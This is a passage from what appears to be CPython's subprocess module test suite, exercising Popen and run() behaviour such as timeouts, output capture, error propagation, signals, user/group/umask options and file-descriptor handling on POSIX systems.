(path_cmd, False, 7, f"<Popen: returncode: 7 args: {pathlib_cls}('my-tool.py')>")
]
with unittest.mock.patch.object(subprocess.Popen, '_execute_child'):
for cmd, shell, code, sx in cases:
p = subprocess.Popen(cmd, shell=shell)
p.returncode = code
self.assertEqual(repr(p), sx)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
ZERO_RETURN_CMD, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_includes_filename(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.call(['/opt/nonexistent_binary', 'with', 'some', 'args'])
self.assertEqual(c.exception.filename, '/opt/nonexistent_binary')
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_with_bad_cwd(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.Popen(['exit', '0'], cwd='/some/nonexistent/directory')
self.assertEqual(c.exception.filename, '/some/nonexistent/directory')
def test_class_getitems(self):
self.assertIsInstance(subprocess.Popen[bytes], types.GenericAlias)
self.assertIsInstance(subprocess.CompletedProcess[str], types.GenericAlias)
@unittest.skipIf(not sysconfig.get_config_var("HAVE_VFORK"),
"vfork() not enabled by configure.")
@mock.patch("subprocess._fork_exec")
def test__use_vfork(self, mock_fork_exec):
self.assertTrue(subprocess._USE_VFORK) # The default value regardless.
mock_fork_exec.side_effect = RuntimeError("just testing args")
with self.assertRaises(RuntimeError):
subprocess.run([sys.executable, "-c", "pass"])
mock_fork_exec.assert_called_once()
self.assertTrue(mock_fork_exec.call_args.args[-1])
with mock.patch.object(subprocess, '_USE_VFORK', False):
with self.assertRaises(RuntimeError):
subprocess.run([sys.executable, "-c", "pass"])
self.assertFalse(mock_fork_exec.call_args_list[-1].args[-1])
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = subprocess.run(ZERO_RETURN_CMD, check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
def test_run_with_pathlike_path(self):
# bpo-31961: test run(pathlike_object)
# the name of a command that can be run without
# any arguments that exit fast
prog = 'tree.com' if mswindows else 'ls'
path = shutil.which(prog)
if path is None:
self.skipTest(f'{prog} required for this test')
path = FakePath(path)
res = subprocess.run(path, stdout=subprocess.DEVNULL)
self.assertEqual(res.returncode, 0)
with self.assertRaises(TypeError):
subprocess.run(path, stdout=subprocess.DEVNULL, shell=True)
def test_run_with_bytes_path_and_arguments(self):
# bpo-31961: test run([bytes_object, b'additional arguments'])
path = os.fsencode(sys.executable)
args = [path, '-c', b'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_run_with_pathlike_path_and_arguments(self):
# bpo-31961: test run([pathlike_object, 'additional arguments'])
path = FakePath(sys.executable)
args = [path, '-c', 'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_capture_output(self):
cp = self.run_python(("import sys;"
"sys.stdout.write('BDFL'); "
"sys.stderr.write('FLUFL')"),
capture_output=True)
self.assertIn(b'BDFL', cp.stdout)
self.assertIn(b'FLUFL', cp.stderr)
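# capture_output=True is shorthand for passing stdout=PIPE and stderr=PIPE,
# which is also why run() rejects combining it with an explicit stdout or
# stderr argument in the two tests below.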
def test_stdout_with_capture_output_arg(self):
# run() refuses to accept 'stdout' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stdout and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stdout=tf)
self.assertIn('stdout', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
def test_stderr_with_capture_output_arg(self):
# run() refuses to accept 'stderr' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stderr and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stderr=tf)
self.assertIn('stderr', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
# This test _might_ wind up a bit fragile on loaded build+test machines,
# as it depends on timing. The margins are wide enough for normal
# situations, and it asserts that the timeout fired "soon enough" to
# believe the right thing happened.
@unittest.skipIf(mswindows, "requires posix like 'sleep' shell command")
def test_run_with_shell_timeout_and_capture_output(self):
"""Output capturing after a timeout mustn't hang forever on open filehandles."""
before_secs = time.monotonic()
try:
subprocess.run('sleep 3', shell=True, timeout=0.1,
capture_output=True) # New session unspecified.
except subprocess.TimeoutExpired as exc:
after_secs = time.monotonic()
stacks = traceback.format_exc() # assertRaises doesn't give this.
else:
self.fail("TimeoutExpired not raised.")
self.assertLess(after_secs - before_secs, 1.5,
msg="TimeoutExpired was delayed! Bad traceback:\n```\n"
f"{stacks}```")
def test_encoding_warning(self):
code = textwrap.dedent("""\
from subprocess import *
run("echo hello", shell=True, text=True)
check_output("echo hello", shell=True, text=True)
""")
cp = subprocess.run([sys.executable, "-Xwarn_default_encoding", "-c", code],
capture_output=True)
lines = cp.stderr.splitlines()
self.assertEqual(len(lines), 2, lines)
self.assertTrue(lines[0].startswith(b"<string>:2: EncodingWarning: "))
self.assertTrue(lines[1].startswith(b"<string>:3: EncodingWarning: "))
def _get_test_grp_name():
for name_group in ('staff', 'nogroup', 'grp', 'nobody', 'nfsnobody'):
if grp:
try:
grp.getgrnam(name_group)
except KeyError:
continue
return name_group
else:
raise unittest.SkipTest('No identified group name to use for this test on this platform.')
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead capture the exception that we want to see
# below for comparison.
desired_exception = e
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
# We mock the __del__ method for Popen in the next two tests
# because it does cleanup based on the pid returned by fork_exec,
# along with issuing a resource warning if it still exists. Since
# we don't actually spawn a process in these tests, we can forgo
# the destructor. An alternative would be to set _child_created to
# False before the destructor is called, but there is no easy way
# to do that.
class PopenNoDestructor(subprocess.Popen):
def __del__(self):
pass
@mock.patch("subprocess._fork_exec")
def test_exception_errpipe_normal(self, fork_exec):
"""Test error passing done through errpipe_write in the good case"""
def proper_error(*args):
errpipe_write = args[13]
# Write the hex for the error code EISDIR: 'is a directory'
err_code = '{:x}'.format(errno.EISDIR).encode()
os.write(errpipe_write, b"OSError:" + err_code + b":")
return 0
fork_exec.side_effect = proper_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(IsADirectoryError):
self.PopenNoDestructor(["non_existent_command"])
@mock.patch("subprocess._fork_exec")
def test_exception_errpipe_bad_data(self, fork_exec):
"""Test error passing done through errpipe_write where it's not
in the expected format."""
error_data = b"\xFF\x00\xDE\xAD"
def bad_error(*args):
errpipe_write = args[13]
# Anything can be in the pipe, no assumptions should
# be made about its encoding, so we'll write some
# arbitrary hex bytes to test it out
os.write(errpipe_write, error_data)
return 0
fork_exec.side_effect = bad_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(subprocess.SubprocessError) as e:
self.PopenNoDestructor(["non_existent_command"])
self.assertIn(repr(error_data), str(e.exception))
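# Background for test_restore_signals below: with restore_signals=True (the
# default) the child resets SIGPIPE, SIGXFZ and SIGXFSZ to SIG_DFL before
# exec, so the SigIgn mask read from /proc/self/status is expected to differ
# between the two check_output() runs.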
@unittest.skipIf(not os.path.exists('/proc/self/status'),
"need /proc/self/status")
def test_restore_signals(self):
# Blindly assume that cat exists on systems with /proc/self/status...
default_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=False)
for line in default_proc_status.splitlines():
if line.startswith(b'SigIgn'):
default_sig_ign_mask = line
break
else:
self.skipTest("SigIgn not found in /proc/self/status.")
restored_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=True)
for line in restored_proc_status.splitlines():
if line.startswith(b'SigIgn'):
restored_sig_ign_mask = line
break
self.assertNotEqual(default_sig_ign_mask, restored_sig_ign_mask,
msg="restore_signals=True should've unblocked "
"SIGPIPE and friends.")
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c", "import os; print(os.getsid(0))"],
start_new_session=True)
except PermissionError as e:
if e.errno != errno.EPERM:
raise # EACCES?
else:
parent_sid = os.getsid(0)
child_sid = int(output)
self.assertNotEqual(parent_sid, child_sid)
@unittest.skipUnless(hasattr(os, 'setpgid') and hasattr(os, 'getpgid'),
'no setpgid or getpgid on platform')
def test_process_group_0(self):
# For code coverage of calling setpgid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c", "import os; print(os.getpgid(0))"],
process_group=0)
except PermissionError as e:
if e.errno != errno.EPERM:
raise # EACCES?
else:
parent_pgid = os.getpgid(0)
child_pgid = int(output)
self.assertNotEqual(parent_pgid, child_pgid)
@unittest.skipUnless(hasattr(os, 'setreuid'), 'no setreuid on platform')
def test_user(self):
# For code coverage of the user parameter. We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
uid = os.geteuid()
test_users = [65534 if uid != 65534 else 65533, uid]
name_uid = "nobody" if sys.platform != 'darwin' else "unknown"
if pwd is not None:
try:
pwd.getpwnam(name_uid)
test_users.append(name_uid)
except KeyError:
# unknown user name
name_uid = None
for user in test_users:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(user=user, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getuid())"],
user=user,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
except OSError as e:
if e.errno not in (errno.EACCES, errno.EPERM):
raise
else:
if isinstance(user, str):
user_uid = pwd.getpwnam(user).pw_uid
else:
user_uid = user
child_user = int(output)
self.assertEqual(child_user, user_uid)
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=-1)
with self.assertRaises(OverflowError):
subprocess.check_call(ZERO_RETURN_CMD,
cwd=os.curdir, env=os.environ, user=2**64)
if pwd is None and name_uid is not None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=name_uid)
@unittest.skipIf(hasattr(os, 'setreuid'), 'setreuid() available on platform')
def test_user_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=65535)
@unittest.skipUnless(hasattr(os, 'setregid'), 'no setregid() on platform')
def test_group(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
if grp is not None:
group_list.append(name_group)
for group in group_list + [gid]:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(group=group, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getgid())"],
group=group,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
else:
if isinstance(group, str):
group_gid = grp.getgrnam(group).gr_gid
else:
group_gid = group
child_group = int(output)
self.assertEqual(child_group, group_gid)
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=-1)
with self.assertRaises(OverflowError):
subprocess.check_call(ZERO_RETURN_CMD,
cwd=os.curdir, env=os.environ, group=2**64)
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=name_group)
@unittest.skipIf(hasattr(os, 'setregid'), 'setregid() available on platform')
def test_group_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=65535)
@unittest.skipUnless(hasattr(os, 'setgroups'), 'no setgroups() on platform')
def test_extra_groups(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
perm_error = False
if grp is not None:
group_list.append(name_group)
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os, sys, json; json.dump(os.getgroups(), sys.stdout)"],
extra_groups=group_list)
except OSError as ex:
if ex.errno != errno.EPERM:
raise
perm_error = True
else:
parent_groups = os.getgroups()
child_groups = json.loads(output)
if grp is not None:
desired_gids = [grp.getgrnam(g).gr_gid if isinstance(g, str) else g
for g in group_list]
else:
desired_gids = group_list
if perm_error:
self.assertEqual(set(child_groups), set(parent_groups))
else:
self.assertEqual(set(desired_gids), set(child_groups))
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[-1])
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD,
cwd=os.curdir, env=os.environ,
extra_groups=[2**64])
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD,
extra_groups=[name_group])
@unittest.skipIf(hasattr(os, 'setgroups'), 'setgroups() available on platform')
def test_extra_groups_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[])
@unittest.skipIf(mswindows or not hasattr(os, 'umask'),
'POSIX umask() is not available.')
def test_umask(self):
tmpdir = None
try:
tmpdir = tempfile.mkdtemp()
name = os.path.join(tmpdir, "beans")
# We set an unusual umask in the child so as a unique mode
# for us to test the child's touched file for.
subprocess.check_call(
[sys.executable, "-c", f"open({name!r}, 'w').close()"],
umask=0o053)
# Ignore execute permissions entirely in our test,
# filesystems could be mounted to ignore or force that.
st_mode = os.stat(name).st_mode & 0o666
expected_mode = 0o624
self.assertEqual(expected_mode, st_mode,
msg=f'{oct(expected_mode)} != {oct(st_mode)}')
finally:
if tmpdir is not None:
shutil.rmtree(tmpdir)
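# The expected mode above is just arithmetic: open() creates the file with
# mode 0o666, the child's umask of 0o053 clears those bits, and
# 0o666 & ~0o053 == 0o624.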
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals IntEnum to provide
# the word "signal", the signal name, and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._fork_exec,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
enabled = gc.isenabled()
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
finally:
if not enabled:
gc.disable()
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that).
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
self.assertEqual(out, b'apple')
self.assertEqual(err, b'orange')
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
